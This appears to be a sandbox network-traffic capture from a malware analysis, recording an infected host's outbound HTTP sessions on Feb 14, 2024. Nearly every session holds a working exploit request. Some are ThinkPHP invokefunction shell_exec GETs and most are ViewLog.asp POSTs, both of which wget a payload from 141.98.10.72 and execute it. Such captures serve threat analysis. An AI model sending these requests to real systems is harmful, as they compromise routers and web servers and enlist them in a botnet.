2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            636192.168.2.235969695.181.239.1080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:24.050303936 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            637192.168.2.233417631.136.66.858080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:24.070214033 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:24.759510994 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:26.103463888 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:29.014945984 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:34.390238047 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:45.140847921 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:07.153542995 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:30:50.155812979 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            638192.168.2.234290094.121.34.2018080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:24.098431110 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            639192.168.2.234702295.216.221.14080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:24.172250986 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:24.398792028 CET404INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:29:24 GMT
                                                            Server: Apache
                                                            Content-Length: 226
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            640192.168.2.233916495.216.139.7380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:24.173543930 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:24.393651009 CET339INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Wed, 14 Feb 2024 08:29:24 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            641192.168.2.235383262.234.36.228080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:24.187100887 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            642192.168.2.235207295.12.141.11380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:24.277981997 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:24.524429083 CET101INHTTP/1.1 404 Not Found
                                                            Content-type: text/html
                                                            Content-Length: 0
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            643192.168.2.234277294.121.47.688080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:24.296219110 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            644192.168.2.234234231.200.64.1428080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:24.297998905 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            645192.168.2.233737095.100.13.10480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:24.480140924 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:24.854338884 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:29:24 GMT
                                                            Date: Wed, 14 Feb 2024 08:29:24 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 63 37 32 32 63 33 31 26 23 34 36 3b 31 37 30 37 38 39 39 33 36 34 26 23 34 36 3b 31 31 36 62 33 65 39 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;4c722c31&#46;1707899364&#46;116b3e90</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            646192.168.2.234039031.200.116.1068080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:24.621500969 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            647192.168.2.233613294.121.43.1508080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:24.623070955 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            648192.168.2.235051031.200.45.1518080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:24.623275042 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            649192.168.2.235048485.194.55.1768080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:25.095503092 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            650192.168.2.233385695.217.238.278080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:25.096930027 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:25.330720901 CET88INHTTP/1.0 400 Bad Request
                                                            Data Raw: 43 6c 69 65 6e 74 20 73 65 6e 74 20 61 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 74 6f 20 61 6e 20 48 54 54 50 53 20 73 65 72 76 65 72 2e 0a
                                                            Data Ascii: Client sent an HTTP request to an HTTPS server.


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            651192.168.2.2359330112.171.223.23080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:25.139241934 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:25.428873062 CET490INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Wed, 14 Feb 2024 08:29:24 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            652192.168.2.2349292112.216.162.19580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:29:25.164999962 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:25.477545023 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Wed, 14 Feb 2024 08:29:25 GMT
                                                            Connection: close
                                                            Content-Length: 311
